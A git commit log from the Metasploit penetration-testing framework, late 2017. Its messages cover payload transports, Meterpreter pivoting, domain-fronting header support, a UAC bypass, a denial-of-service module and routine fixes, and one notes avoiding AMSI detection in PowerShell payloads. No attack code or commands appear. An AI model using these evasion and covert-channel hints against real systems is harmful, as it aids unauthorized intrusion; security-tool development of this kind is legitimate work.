Brent Cook
f7dfba6bae
deduplicate code from python meterpreter
2017-12-12 03:12:36 -06:00
Brent Cook
b7c231bb93
further normalize transport config
2017-12-12 03:12:36 -06:00
Brent Cook
bb5ea540ab
fix a number of TODO's in the HTTP handler, remove duplication in handlers
2017-12-12 03:12:36 -06:00
Brent Cook
528a423fc0
fix python override scheme
2017-12-12 03:12:36 -06:00
Brent Cook
f49006222c
remove unneeded uri
2017-12-12 03:12:36 -06:00
Brent Cook
8e76c4cb4f
handle override at the meterpreter config layer
2017-12-12 03:12:36 -06:00
Brent Cook
636b93b026
minor simplification
2017-12-12 03:12:36 -06:00
Brent Cook
017374be71
pass lhost/lport back into generate_stage with reverse_http/s
2017-12-12 03:12:36 -06:00
Brent Cook
1653e31f71
Merge branch 'upstream-master' into land-9126-
2017-12-11 03:57:00 -06:00
Metasploit
348cbe54b6
Bump version of framework to 4.16.23
2017-12-08 10:01:55 -08:00
Pearce Barry
7aef0f249e
Per MS-2916, load Mettle extensions via new API.
2017-12-07 20:40:22 -06:00
William Vu
2565ad6a27
Handle IPv6 addresses in full_uri (add brackets)
2017-12-07 12:56:55 -06:00
Brent Cook
c15f379343
remove some unneeded backward-compat code
2017-12-04 22:27:21 -06:00
William Vu
19b37c7070
Land #9263 , drb_remote_codeexec fixes
...
See pull requests #7531 and #7749 for hysterical raisins.
2017-12-04 18:45:03 -06:00
Metasploit
fd1681edd9
Bump version of framework to 4.16.22
2017-12-01 10:04:07 -08:00
Brent Cook
09dd5b8489
fix check command to not require an rport _method_
2017-11-30 10:51:21 -06:00
Brent Cook
c848379ecb
simply use refname in the prompt?
2017-11-29 20:52:14 -06:00
Brent Cook
e5a5d35ad8
add 'promptname' that expands the module path a bit more
...
This allows the user to actually see the module context.
2017-11-29 19:49:43 -06:00
Brent Cook
55f56a5350
Land #9110 , added -C option to change default hosts columns
2017-11-29 17:48:44 -06:00
Brent Cook
0aeb245c9c
Land #9252 , docker improvements
2017-11-29 17:15:47 -06:00
bwatters-r7
e8965767a0
Land 9207, Expose more uuid attributes
2017-11-29 16:25:05 -06:00
Metasploit
174d0d46de
Bump version of framework to 4.16.21
2017-11-29 10:45:55 -08:00
Brent Cook
70ec576d52
use correct session variable
2017-11-29 11:53:56 -06:00
Brent Cook
ec2b5d48a6
add missing payload uuid accessors
2017-11-29 11:49:41 -06:00
Brent Cook
446f3fa675
more conversions
2017-11-29 11:49:41 -06:00
Brent Cook
59446f3d96
change ui to use new settings
2017-11-29 11:49:41 -06:00
Brent Cook
8051f790d0
if there is info in the uuid_db, put it in payload_uuid automatically
2017-11-29 11:49:41 -06:00
Jeffrey Martin
e73ba0b3ca
Merge released '4.x' into master
2017-11-29 10:27:42 -06:00
Adam Cammack
3fff092042
Fix include scope in external module mixin
...
The auxiliary report mixin overrides some of the methods in
Metasploit::Credential, which is fine in framework, but causes issues in
projects relying on the base behavior of Metasploit::Credential. This
changes the include scope from global to just whatever includes the
external module mixin.
2017-11-28 21:41:52 -06:00
William Vu
f132c1572f
Fix #9194 , clarified error for reloading modules
2017-11-28 17:15:56 -06:00
William Vu
7b3bf85d03
Print the generated command stager for debugging
2017-11-28 16:00:28 -06:00
Christian Mehlmauer
50351320d7
more docker work
2017-11-28 21:35:20 +01:00
William Vu
65412cd2f1
Land #9201 , enhanced tab completion
2017-11-27 11:37:04 -06:00
Brent Cook
2c6cfabbc3
Land #8948 , allow configuring payload HTTP headers for domain fronting
2017-11-25 10:08:22 -06:00
Brent Cook
8645a518b3
add mettle support for custom headers
2017-11-24 20:27:34 -06:00
Metasploit
c9da8f7a18
Bump version of framework to 4.16.20
2017-11-24 10:01:50 -08:00
Tim W
ce9d2aff2b
more osx hacks
2017-11-22 17:25:49 +08:00
Tim W
0f2bfb70c0
hacky fix for osx
2017-11-22 13:07:42 +08:00
scriptjunkie
9a81cc70dd
Fix corruption of non-latin characters in W methods
2017-11-21 20:58:38 -06:00
Brent Cook
81c6823b72
handle interrupt and unknown exceptions properly with external modules
2017-11-21 17:50:53 -06:00
Adam Cammack
19844fb6ed
Land #9227 , Add slowloris denial of service
2017-11-21 15:42:39 -06:00
Tim
92190403cc
use full target_path
2017-11-22 05:42:01 +08:00
Matthew Kienow
b6c81e6da0
Reimplement slowloris as external module
2017-11-21 16:21:01 -05:00
OJ
fea28a89a5
Fix TLV defs for http headers
2017-11-21 13:47:19 -06:00
Brent Cook
ea37196614
use cooler names c/o @timwr, make options easier to grep
2017-11-21 13:47:19 -06:00
Brent Cook
85acbadf01
more DRYing
2017-11-21 13:47:19 -06:00
Brent Cook
37ab771ca9
uri is not always defined, fix python stager generation
2017-11-21 13:47:19 -06:00
Brent Cook
2076db2d61
DRY up common stager and payload http and retry options
2017-11-21 13:47:19 -06:00
Brent Cook
1fd7f7c8bc
prefix MeterpreterUserAgent and PayloadProxy* with Http for consistency,
...
this also adds aliases where needed
2017-11-21 13:47:19 -06:00
Tim
a5af21fa1a
add http headers to Android/Java
2017-11-21 13:47:19 -06:00
OJ
ac79cc9f78
Fix up header string generation in transports
2017-11-21 13:47:18 -06:00
OJ
f6e9b12b43
Make sure stageless is supported
2017-11-21 13:47:18 -06:00
OJ
656babe9f4
Custom host header support in python meterp
2017-11-21 13:47:18 -06:00
OJ
a78d8f83fc
Add HTTP header support for Host/Cookie/Referer
...
This is to start the support for things like domain fronting.
2017-11-21 13:47:18 -06:00
Brent Cook
a4e199a6dd
Land #9000 , enhance module option registration
2017-11-21 12:09:21 -06:00
Brent Cook
c5cc013819
auto-detect SSL supported options
2017-11-21 08:30:42 -06:00
Brent Cook
967b459ff1
restore default enum is first value behavior
2017-11-21 08:30:42 -06:00
Brent Cook
6615c6efc7
tighten up corner cases with option validation
2017-11-21 08:30:42 -06:00
Brent Cook
6da66e885a
fix enum default logic for bools that default to false
2017-11-21 08:30:42 -06:00
Brent Cook
d811a2a8c1
set good defaults
2017-11-21 02:52:05 -06:00
Brent Cook
65c58c3d55
set a good default, remove unused methods, speed up checks
2017-11-21 02:52:05 -06:00
Brent Cook
ffa6d74a23
remove historical cruft
2017-11-21 02:52:05 -06:00
Brent Cook
d3ee86dc5c
update to new format
2017-11-21 02:52:05 -06:00
Brent Cook
249c08f597
usability improvements ith how base options are registered
...
This adds named parameters for all of the current array-index based
options. It also allows specifying the description as the 2nd parameter,
allowing the 'required' parameter to be implicitly false (the most
common value).
A simple parameter like:
OptAddress.new('ReverseListenerBindAddress',
[false, 'The specific IP address to bind to on the local system']),
Can now be rewritten as:
OptAddress.new('ReverseListenerBindAddress',
'The specific IP address to bind to on the local system'),
More complex options are also now easier to read:
OptString.new(
'HttpUserAgent',
'The user-agent that the payload should use',
default: Rex::UserAgent.shortest,
aliases: ['MeterpreterUserAgent']
),
This also makes dealing with enums easier because default is implicit
unless specified. This:
OptEnum.new('PayloadProxyType',
[true, 'The proxy type, HTTP or SOCKS', 'HTTP', ['HTTP', 'SOCKS']]),
Becomes:
OptEnum.new('HttpProxyType',
'The proxy type, HTTP or SOCKS', required: true, enums: ['HTTP', 'SOCKS'])
This maintains full backward compatibility with existing code as well.
2017-11-21 02:52:05 -06:00
Adam Cammack
40a71af7ed
Add missing `end`
2017-11-20 17:50:59 -06:00
Adam Cammack
2fdc34c8fd
Add new template for DoS modules
2017-11-20 17:19:14 -06:00
Adam Cammack
dd57138423
Make external module read loop more robust
...
Changes from a "hope we get at most one message at a time" model to
something beginning to resemble a state machine. Also logs error output
and fails the MSF module when the external module fails.
2017-11-20 16:52:05 -06:00
Matthew Kienow
39f06a3995
Land #8807 , template for external module servers
2017-11-20 17:34:37 -05:00
christopher lee
238aecf81c
Integrated first round of feedback
2017-11-20 10:45:39 -06:00
christopher lee
621130d74b
Added missing requires
2017-11-17 13:06:05 -06:00
christopher lee
a16cd5aade
Clean up metadata store logic
2017-11-17 12:42:19 -06:00
Metasploit
602406a423
Bump version of framework to 4.16.19
2017-11-17 10:02:22 -08:00
christopher lee
0e642bd9cd
Remove puts and fix bug
2017-11-16 12:59:14 -06:00
christopher lee
e89eb6e8b6
Fix first time startup timing bug
2017-11-16 12:50:31 -06:00
Metasploit
5cdd364590
Bump version of framework to 4.16.18
2017-11-15 19:46:12 -08:00
christopher lee
fe1af35107
First pass at changes needed for module metadata caching
2017-11-15 16:38:01 -06:00
Adam Cammack
f357efd97c
Land #9208 , add AArch64 ELF to Msf::Util::Exe
2017-11-15 14:22:27 -06:00
Tim
4ec0faf35d
fix aarch64 cmdstager
2017-11-15 16:47:17 +08:00
Jeffrey Martin
80b381cde9
Merge released '4.x' into master
2017-11-13 14:11:23 -06:00
Spencer McIntyre
bc691cbd00
Document the new tab completion functions
2017-11-11 17:17:48 -05:00
Spencer McIntyre
fb7635502d
Tab completion for exploit and handler commands
2017-11-11 17:11:54 -05:00
Spencer McIntyre
68a43fef36
Add the new generic tab completion functoin
2017-11-11 16:47:11 -05:00
Metasploit
4f660d7dd7
Bump version of framework to 4.16.17
2017-11-10 10:05:05 -08:00
William Vu
97859ebf8c
Clarify XXX comment no user will ever see anyway
2017-11-09 15:23:37 -06:00
William Vu
577baf6070
Add a check for .rb in cmd_edit
2017-11-09 15:17:53 -06:00
Patrick Webster
2f6da89674
Change author name to nick.
2017-11-09 03:00:24 +11:00
William Vu
fbbc8da8fb
Fix raise(s) in MSSQL client aborting mssql_login
2017-11-07 14:30:47 -06:00
christopher lee
43ddc66350
Initial fix for non db cache
2017-11-07 10:33:47 -06:00
Metasploit
deb5a7b015
Bump version of framework to 4.16.16
2017-11-03 10:03:38 -07:00
h00die
697031eb36
mysql UDF now multi
2017-11-03 05:26:05 -04:00
Metasploit
a14102083c
Bump version of framework to 4.16.15
2017-11-02 10:01:12 -07:00
bwatters-r7
c2a979dd3c
Land #9134 , fix buggy handling of partial ingress packet data
2017-11-01 20:06:23 -05:00
Spencer McIntyre
d815e42ccf
Add a generic tab completion function
2017-11-01 20:38:45 -04:00
William Vu
5de190f092
Land #9145 , ERB/<ruby> for Meterpreter resource
2017-11-01 13:48:51 -05:00
Brent Cook
a347dee372
Land #9150 , fix broken and simplify unusual RuntimeError exceptions
2017-11-01 06:03:36 -05:00
Brent Cook
90766ceceb
remove more unusual raise RuntimeError patterns
2017-11-01 05:59:12 -05:00
Spencer McIntyre
1462330f34
Add tab completion to the payload generate command
2017-10-31 20:33:31 -04:00
lvarela-r7
c36184697c
Merge pull request #9150 from bcook-r7/runtimeerror
...
Fix several broken raise RuntimeError calls in error paths
2017-10-31 14:47:42 -05:00
Pearce Barry
48975a4327
Support multiple suffixes on meterpreter extensions.
2017-10-31 10:04:34 -05:00
Pearce Barry
daf2acc2b1
Initial work to support Mettle exetensions (and a sniffer).
...
See MS-2775.
2017-10-31 10:04:30 -05:00
Brent Cook
95b6cda06e
Land #9146 , add e500v2 and reduce size of x86_64
2017-10-31 09:54:07 -05:00
Brent Cook
c4dcd79e41
Land #9144 , fix misspelling in exploit/windows/local/wmi_persistence
2017-10-31 05:01:13 -05:00
Brent Cook
aa0ac57238
use implicit RuntimeError
2017-10-31 04:53:14 -05:00
Brent Cook
9389052f61
fix more broken RuntimeError calls
2017-10-31 04:45:19 -05:00
Brent Cook
f42b980cf0
fix misspelled RuntimeError
2017-10-30 15:42:11 -05:00
Brent Cook
56eb828cc5
add e500v2 payloads
2017-10-30 14:04:10 -05:00
Spencer McIntyre
940573ad49
Support ruby directives in Meterpreter rc scripts
2017-10-29 15:57:33 -04:00
h00die
3b8ef02c29
sid vs side
2017-10-29 08:36:05 -04:00
William Vu
9349e1eda5
Fix find_script_path to check only files
2017-10-27 12:28:58 -05:00
William Vu
73c9807c55
Add module support for sessions -s
2017-10-27 12:28:53 -05:00
Metasploit
140955f220
Bump version of framework to 4.16.14
2017-10-27 10:03:00 -07:00
Brent Cook
d188982760
handle masked EOF from Rex sockets (TODO: kill that behavior)
2017-10-27 02:29:25 -07:00
Brent Cook
85b59c87ca
fix buggy handling of partial ingress packet data
...
If we have more data, and the packet parser needs more data, connect the two
together rather than bailing. This fixes reverse_tcp_ssl along with probably a
lot of other higher-latency corner cases.
2017-10-27 02:15:08 -07:00
Jeffrey Martin
4274b76473
Land #9119 , Fix #8436 , allow session upgrading on meterpreter sessions
2017-10-25 10:26:27 -05:00
Jeffrey Martin
386e14828a
Land #8728 , Psexec via PSH related fixes
2017-10-24 15:55:18 -05:00
Tim
40e57d7ee6
android payload options
2017-10-24 18:32:47 +08:00
Brent Cook
1b01232624
Land #9070 , Fix bug copying MACE attributes between files
2017-10-23 22:15:42 -05:00
Brent Cook
402e926151
Land #9081 , Fix ftp.rb to get files larger than 16384
2017-10-23 22:11:36 -05:00
Brent Cook
c6bc55a175
Land #9082 , Fix ftp.rb so it closes all data sockets
2017-10-23 22:10:38 -05:00
Tim
ca4feb5136
fix session upgrading
2017-10-23 01:26:45 +08:00
Dave Farrow
636551aa03
Fixed help message to match test
2017-10-20 21:32:54 -07:00
Dave Farrow
ea1ac3d5b3
#9108 : added -C option to change default hosts columns
...
The -C option saves the column list the user provided and uses that as the default column list until msfconsole is restarted
2017-10-20 20:39:38 -07:00
Metasploit
884b68fa60
Bump version of framework to 4.16.13
2017-10-20 10:02:23 -07:00
William Vu
c795cef69f
Land #9099 , disconnect option for send_request_cgi
2017-10-20 10:50:56 -05:00
William Vu
8e5deac3f4
Fix nil bug in setting PromptChar without Prompt
2017-10-20 00:38:01 -05:00
RageLtMan
a3912e4913
Provide disconnect option to send_request_cgi
...
The HTTP client mixin provides a #send_request_cgi method which
forcibly disconnects the client after receiving a response. This
terminates certain types of resulting sessions which depend on the
connection from the client to maintain a subprocess housing the
shell invocation.
Provide a disconnect boolean option to #send_request_cgi which
is checked in the disconnect(c) call after receiving the response.
Testing:
Locally tested on in-house exploit module written for disclosure
report.
TODO:
Discuss possibility of implementing fully asynchronous methods
like #send_request_cgi_async which won't bother getting a response
for cases such as the module mentioned above which is a command
injection via unfiltered POST var.
2017-10-19 21:22:31 -04:00
William Vu
60a7a80ff0
Land #9095 , default PromptTimeFormat (%T)
2017-10-17 16:50:47 -05:00
James Lee
af42f517b8
Default PromptTimeFormat to %T
2017-10-17 16:39:44 -05:00
Evgeny Naumov
d5cdd2567a
add missing method
2017-10-16 16:01:53 -04:00
Jeffrey Martin
b04f5bdf90
Land #9077 , Enhancing the functionality on the nodejs shell_reverse_tcp payload.
2017-10-16 10:49:17 -05:00
Jeffrey Martin
6df8c40bb1
adjust whitespace 'no tabs' more reabable
2017-10-13 17:01:47 -05:00
Wei Chen
6b89f62b08
Land #9080 , ensure autoruns on shell sessions
...
Land #9080
2017-10-13 15:35:31 -05:00
Wei Chen
5ce4c32213
Use session object instead of self
...
The session object has :process_autoruns, not self
2017-10-13 15:33:27 -05:00
William Vu
b2de5aba07
Fix #9075 , super setup fix for local exploits
2017-10-13 12:45:14 -05:00
bigendiansmalls
1b306caf39
Fixed ftp.rb to get files larger than 16384
...
Existing ftp.rb did get_once, which limits file
DL to 16384 (def_block_size). Change to get and
added one more timeout variable see:
http://www.rubydoc.info/gems/librex/Rex%2FIO%2FStream:def_block_size
and
http://www.rubydoc.info/gems/librex/Rex%2FIO%2FStream:get_once
and
http://www.rubydoc.info/gems/librex/Rex%2FIO%2FStream:get
2017-10-13 12:41:11 -05:00
Metasploit
88585a5cfd
Bump version of framework to 4.16.12
2017-10-13 10:03:48 -07:00
bigendiansmalls
e5e9c7ccd6
Fixed ftp.rb so it closes all data sockets
...
ftp.rb was doing a shutdown without a close on data
(not command) sockets. This can cause CLOSE_WAIT
for extended periods in certain circumstances-ending
only when msf itself is closed.
2017-10-13 10:09:43 -05:00
Brent Cook
e209256d62
ensure we do autoruns for all session types
2017-10-12 23:11:58 -05:00
William Vu
bf2fb7051a
Fix session compatibility check for post modules
2017-10-12 11:57:11 -05:00
itsmeroy2012
a0abffb6c4
Adding functionality of StagerRetryWait and StagerRetryCount
2017-10-12 22:25:00 +05:30
William Vu
f556a5f805
Add compatible session types to post module info
2017-10-12 11:41:02 -05:00
itsmeroy2012
374c139d33
Increasing the functionality of the nodejs shell_reverse_tcp payload
2017-10-12 19:05:59 +05:30
bwatters-r7
294230c455
Land #8509 , add Winsxs bypass for UAC
2017-10-11 16:24:52 -05:00
William Webb
84fe0847bf
Land #9074 , Add prints and error checking to HTTP CmdStagers
2017-10-11 14:27:52 -05:00
William Vu
27876a91d3
Add prints and better checking to HTTP CmdStagers
...
Admittedly, this code is more convoluted than it needs to be.
2017-10-11 14:01:56 -05:00
Jeffrey Martin
b76c1f3647
remove invalid 'client' object reference in nodejs
...
fix #9063 by removing invalid object reference introduced in PR #8825
2017-10-11 11:09:28 -05:00
Bradley Landherr
bdc00ef2df
Removing unecessary comment
2017-10-11 06:34:09 -07:00
Bradley Landherr
8dee369eb7
Fixing the -f option, removing reference to undefined 'path' variable & get_file_mace already returns a 'Time' object instance
2017-10-11 06:28:03 -07:00
Adam Cammack
88f53352c7
Land #9056 , Check for /etc/issue before reading
2017-10-10 15:05:27 -05:00
Jeffrey Martin
57afc3b939
Land #9044 , Address generation issues with pure PSH payloads
2017-10-10 10:40:33 -05:00
h00die
bf731b4f5e
look before leap issues
2017-10-09 14:27:09 -04:00
Adam Cammack
436b72d4cc
Land #9023 , Add tab completion to the edit command
2017-10-09 11:37:12 -05:00
William Vu
27dcc162b2
Revert to Vim because ed is the standard editor
...
https://www.gnu.org/fun/jokes/ed-msg.html
2017-10-09 11:34:45 -05:00
William Webb
14308fb77d
Land #9045 , Copy original request ID into TLV response
2017-10-09 10:58:02 -05:00
bwatters-r7
fc5ab96ad6
Merging to prep for testing
...
Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master
2017-10-09 10:31:30 -05:00
bwatters-r7
7df18e378d
Fix conflicts in PR 8509 by mergeing to master
2017-10-09 10:30:21 -05:00
James Barnett
56e95f15c9
Land #9024 , fix bug when manually adding loot
...
cmd_loot was throwing a stack trace when the host was not properly defined.
This fixes it to give a useful error message.
2017-10-06 16:02:12 -05:00
Jeffrey Martin
d0a1fb6019
tlv response to ID based request with original ID
...
When a tlv response is created the request ID being responded to
needs to be copied into response created.
2017-10-06 13:58:38 -05:00
William Webb
d9e0d891a1
Land #9010 , Remove checks for hardcoded SYSTEM account name
2017-10-06 13:42:18 -05:00
RageLtMan
124a1531f4
Clean up powershell exec string
...
The scriptblock invocation is already coming from Rex, so there's
no need to re-wrap the executed code in more of the same.
2017-10-06 13:19:36 -04:00
Metasploit
4acef04e0d
Bump version of framework to 4.16.11
2017-10-06 10:01:51 -07:00
RageLtMan
9afdde2938
Address generation issues with pure PSH payloads
...
Powershell payloads were generating using the :generate method
mixed in from Payload::Windows::Exec which is a binary payload
mixin.
Address the breakage by implementing a generate method which simply
outputs the script code produced by the module with no additional
content prepended or appended.
While here, cleanup the commandline generation for the script being
produced by having Rex do it (this permits changes made in Rex to
benefit all consumers).
As a bonus, drop the IEX invocation since it'll trip up AMSI and
upgrade to the scripblock execution semantic.
Credit for finding this little gem goes to bperry - i dont usually
use the native powershell command shells, and managed to miss this
for a long time. Thanks boss.
Testing:
Local in pry
@bperry: Could you test and ping me back if this is right?
2017-10-06 12:32:52 -04:00
Brent Cook
809d0f79a1
Land #9026 , Fix cache invalidation bug in tab completion
2017-10-05 16:41:00 -05:00
Brent Cook
b7e209a5f3
Land #9033 , Geolocate API update
2017-10-05 16:39:09 -05:00
Tim
e534d3cdc8
fix transport and sleep commands on java
2017-10-04 10:36:01 +08:00
William Vu
5b9a4d73ee
Readd hostless loot display
...
In the chance event someone actually managed to store it.
2017-10-02 23:31:44 -05:00
William Vu
403b5e2fa8
Move TARGET check into option_values_payloads
2017-10-02 23:22:42 -05:00
h00die
fc66683502
fixes #8928
2017-10-01 19:49:32 -04:00
William Vu
9941097a5c
Remove extraneous else
2017-09-29 19:01:04 -05:00
William Vu
e8d0f2dde0
Fix missing message for vprint_* in AuthBrute
2017-09-29 18:51:35 -05:00
William Vu
6de986bd70
Fix cache invalidation bug in tab completion
...
We use active_module instead of cmd_use to invalidate @cache_payloads,
since the ivar is no longer shared between cmd_set and cmd_use.
Fixes #8483 . See #7655 .
2017-09-29 18:01:50 -05:00
William Vu
0723477b49
Fix nil bug in loot -a and nix hostless loot
...
Apparently you can't actually store hostless loot.
2017-09-29 16:16:16 -05:00
William Vu
1ec968192b
Add tab completion to the edit command
2017-09-29 15:43:53 -05:00
bwatters-r7
e0fee9e317
Land #8821 , Expose session naming
2017-09-29 15:32:47 -05:00
Metasploit
32104eb90e
Bump version of framework to 4.16.10
2017-09-29 10:04:04 -07:00
loftwing
f777e2ab3b
Merge branch 'master' into fix_nmap_imports
...
bringing branch up to date
2017-09-27 12:52:27 -05:00
loftwing
51c1cddb5c
Removed requirement for a host to have ports
2017-09-27 12:43:50 -05:00
OJ
3068fb6e7e
Fix getprivs and getsystem
...
This is a fix for crap and stupid stuff that I did half way through the
packet pivot code. I was working on some priv stuff at the same time,
and when I realised that the work I was doing was not sensible as part
of the packet pivot PR, I failed to revert my changes properly.
As a result I broke `getprivs` and `getsystem`. I am sorry. And I'm
ashamed.
2017-09-27 16:31:42 +10:00
Christian Mehlmauer
81406a073e
tidy up code
2017-09-27 08:01:48 +02:00
Christian Mehlmauer
41e3895424
remove checks for hardcoded name
2017-09-27 07:41:06 +02:00
Brent Cook
0d31c1c9a8
Land #8945 , fix issue where we can call shutdown on a closed socket
2017-09-26 16:01:51 -05:00
Brent Cook
71f13db918
style updates
2017-09-26 15:58:43 -05:00
Adam Cammack
0408979e54
Land #9005 , Remove spurious commas
2017-09-26 15:36:33 -05:00
Brent Cook
cad36ee14e
Land #8952 , suhosin compatibility added to staged payload
2017-09-26 15:22:36 -05:00
Adam Cammack
968ae8e267
Land #8925 , Allow `edit` to optionally take a path
2017-09-26 13:32:39 -05:00
root
ec51ab2547
Exit function param bug
2017-09-26 11:16:41 +03:00
William Vu
d234409d40
Land #8918 , wp_admin_shell_upload multisite fix
2017-09-25 13:54:10 -05:00
Josh Hale
0e59f47095
Comments and whitespace check
2017-09-24 16:37:30 -05:00
Josh Hale
23e1b5b872
Add search term support
2017-09-24 16:25:27 -05:00
Josh Hale
664fd1f7e3
Support single file path
2017-09-24 16:13:26 -05:00
Josh Hale
9f0ff3f3a3
Add in sort and order options
2017-09-23 23:14:21 -05:00
Josh Hale
2068514800
Add initial lls command
2017-09-23 21:38:53 -05:00
Brent Cook
d73e95e7db
Land #8946 , fix #8879 , APK injection edge cases
2017-09-23 20:48:12 -04:00
Pearce Barry
8853193542
Land #8987 , Fix opening non-existant files on unix
2017-09-22 13:15:44 -05:00
Metasploit
68fa3d45f3
Bump version of framework to 4.16.9
2017-09-22 10:05:19 -07:00
Adam Cammack
62aac450f8
Change confusing variable name
2017-09-22 11:43:26 -05:00
Adam Cammack
4ea8f639a3
Add host and service reporting to external modules
2017-09-22 11:42:32 -05:00
h00die
36fc01d375
check files before opening
2017-09-21 19:36:19 -04:00
Brent Cook
d8ee4150e6
move client core constants closer to where they are actually used
2017-09-19 03:22:13 -05:00
Brent Cook
5b579baa33
remove unused Linux migration code
2017-09-19 03:04:43 -05:00
Brent Cook
0e15b2d002
remove unneeded METERPRETER_TRANSPORT constants
2017-09-19 02:59:05 -05:00
RageLtMan
271bd4c4fe
Rename METERPRETER_TRANSPORT_SSL to ..._TCP
...
Since OpenSSL is no longer packages with meterpreter, and transport
secrecy is handled at L7, the SSL cons name doesn't apply anymore.
Rename METERPRETER_TRANSPORT_SSL to METERPRETER_TRANSPORT_TCP for
consistency with wire-level implementation.
2017-09-17 14:31:15 -04:00
Metasploit
b2f5bd16e6
Bump version of framework to 4.16.8
2017-09-15 10:02:38 -07:00
Tim
9afb09813f
update cmd_edit_help text
2017-09-13 14:54:35 +08:00
Anant Shrivastava
363d3c28d7
suhosin comaptibility added to staged payload
2017-09-12 08:49:53 +05:30
Craig Smith
b218cc3c7f
Merge branch 'master' into hw_auto_padding_fix
2017-09-11 18:30:34 -07:00
Craig Smith
ad9329993d
Added better padding and flowcontrol support.
2017-09-11 18:20:57 -07:00
Jeffrey Martin
a58552daad
Land #8825 , Handle missing util.pump in nodejs shell payloads
2017-09-11 15:32:21 -05:00
Tim
c3fa30707d
fix #8879 , fix APK injection edge cases
2017-09-11 12:03:20 +08:00
RageLtMan
8d60fdf9e7
Bug - HTTP Client can call :shutdown on closed IO
...
When running Rex HTTP client calls across pivots, pivot sockets
can get closed by the remote server, resulting in a closed :conn
object within the client object. The clients :close method calls
self.conn.shutdown which raises an 'IOError closed stream' on what
is effectively a TCPSocket object in a closed state (under the Rex
abstraction).
Resolve by moving the self.conn.closed? check into the conditional
just above the :shutdown call, and remove if from the underlying
:close call as calling :close on an already closed TCPSocket
returns nil as opposed to throwing an exception like the :shutdown
method.
2017-09-10 03:09:59 -04:00
Metasploit
faa84faf25
Bump version of framework to 4.16.7
2017-09-08 15:38:22 -07:00
Metasploit
f5a73f3efe
Bump version of framework to 4.16.6
2017-09-08 10:03:41 -07:00
Brent Cook
b9fdca04a1
rework logical fix for #8884 to function with bootstrap code
2017-09-07 01:43:58 -05:00
Brent Cook
c365db135a
pull in GUID fixes from #8818
2017-09-07 01:39:49 -05:00
Brent Cook
9877a61eff
bump payloads
2017-09-07 01:36:25 -05:00
OJ
b38a962c09
Fix default session GUID when not specified
...
This resolves an issue with stategless HTTP sessions
2017-09-07 01:36:25 -05:00
OJ
7a2a47586b
Fix named pipe migration stubs
2017-09-07 01:36:25 -05:00
OJ
5294722b96
Prevent socket-like behaviours during migrate on pivoted sessions
2017-09-07 01:36:24 -05:00
OJ
dfba42e2c1
Fix exception when datastore value is nil in meterp session
2017-09-07 01:36:24 -05:00
OJ
4ec87985a2
Fix stager crash and support pivots in x64 meterp loader
2017-09-07 01:36:24 -05:00
OJ
c8b8ef03bd
Force max 0x10000 bytes when reading from pipe in stager
2017-09-07 01:36:23 -05:00
OJ
bfdea35aca
A few UI touch ups
2017-09-07 01:36:23 -05:00
OJ
75270af9e7
Tweaking of the pivot list output
2017-09-07 01:36:23 -05:00
OJ
8b8e5e4cb5
First iteration of the pivot menu for meterpreter
2017-09-07 01:36:23 -05:00
OJ
d525b015f0
Enable keepalive for pivoted sessions
2017-09-07 01:36:22 -05:00
OJ
558d007d8e
Final tweak to avoid issues in session dump
2017-09-07 01:36:22 -05:00
OJ
f004e6f0f2
Fix session output for pivoted sessions
2017-09-07 01:36:22 -05:00
OJ
7acd772c10
Pivot session stability, display and handling
2017-09-07 01:36:21 -05:00
OJ
fdc9864b61
First working packet pivot session!
2017-09-07 01:36:20 -05:00
OJ
e3de01219a
Pushed on with more pivot code
2017-09-07 01:33:54 -05:00
OJ
abc80655b7
Progress in named pipe pivots, more to come
2017-09-07 01:33:54 -05:00
OJ
816e78b6f6
First pass of named pipe code for pivots
2017-09-07 01:33:53 -05:00
William Vu
36bbe00ea1
Land #8922 , db_nmap tab completion fix
2017-09-07 00:28:03 -05:00
Tim
bc02df16b3
update cmd_edit_help
2017-09-06 16:04:54 +08:00
Tim
e83e4d0a7e
add argument to cmd_edit
2017-09-06 11:30:28 +08:00
Tim
636d1a5fcb
fix #8921 , fix crash on nmap tab completion
2017-09-05 16:36:14 +08:00
james
fde68acc0e
Styling changes in wordpress helpers
...
Changes based on rubocop output
2017-09-02 22:26:04 -05:00
james
fdf7149438
Add support for multi-site wp instances in wp_admin_shell_upload
...
This change allows for redirects to be followed in wordpress_helper_get_plugin_upload_nonce
Redirect is from:
/wp-admin/plugin-install.php
to
/wp-admin/network/plugin-install.php
2017-09-02 22:12:56 -05:00
William Webb
055e88d261
Land #8897 , Rewrite timestomp command dispatcher to deal with arguments properly
2017-09-01 12:11:57 -05:00
Metasploit
92f5290a50
Bump version of framework to 4.16.5
2017-09-01 10:08:40 -07:00
Brent Cook
bcfab11ca9
land #8913 , fix false positives of telnet scanner vs http servers
2017-08-31 16:31:08 -05:00
Brent Cook
7c14a3d370
expand the check for weird HTTP / HTML serving servers
2017-08-31 16:30:02 -05:00
Jin Qian
1a735c48b4
Fix MS2715, false positive when telneting against web server
...
Add a condition to identify when server returned HTML as login failure
2017-08-31 11:35:51 -05:00
Tim
86ee77ffb0
add aarch64 nops and fix aarch64 cmdstager
2017-08-31 18:48:58 +08:00
Brent Cook
847407f1dd
Land #8899 , Make backgrounding messages more consistent
2017-08-28 18:51:22 -05:00
William Vu
0e1bafb2d1
Land #8902 , vendored robots gem
2017-08-28 16:42:38 -05:00
Metasploit
a0131f450e
Bump version of framework to 4.16.4
2017-08-28 14:34:39 -07:00
Brent Cook
06fc5c8a3e
add license, fix style violations, log with dlog
2017-08-28 15:47:47 -05:00
Brent Cook
3d489a516c
Only test the first element of status
...
From f5df1ba7827581a7c771a3deffb6062551611134 Mon Sep 17 00:00:00 2001
From: Postmodern <postmodern.mod3@gmail.com>
Date: Thu, 4 Aug 2016 19:35:10 -0700
Subject: [PATCH 2/2] Only test the first element of status
* When using webmock, the `"OK"` String is not present in `StringIO#status`.
2017-08-28 15:47:47 -05:00
Brent Cook
dafd7885e1
Fixing mix case of user-agent.
...
From bfbe173cd6bf91be477ef0affc2c4c86ca75bc1d Mon Sep 17 00:00:00 2001
From: Jason Kim <jkim@avvo.com>
Date: Thu, 3 Nov 2011 15:43:14 -0700
Subject: [PATCH 1/2] Fixing mix case of user-agent. Adding/Fixing test.
2017-08-28 15:47:46 -05:00
Brent Cook
928d632042
import https://github.com/fizx/robots.git 0.10.1
2017-08-28 15:47:46 -05:00
Brent Cook
f7071818b1
more updates
2017-08-28 14:10:51 -05:00
Jeffrey Martin
368e37428e
update nessus v2 import for consistent proto case
2017-08-28 12:32:04 -05:00
Adam Cammack
d6ed1f6f8d
Make backgrounding messages more consistent
...
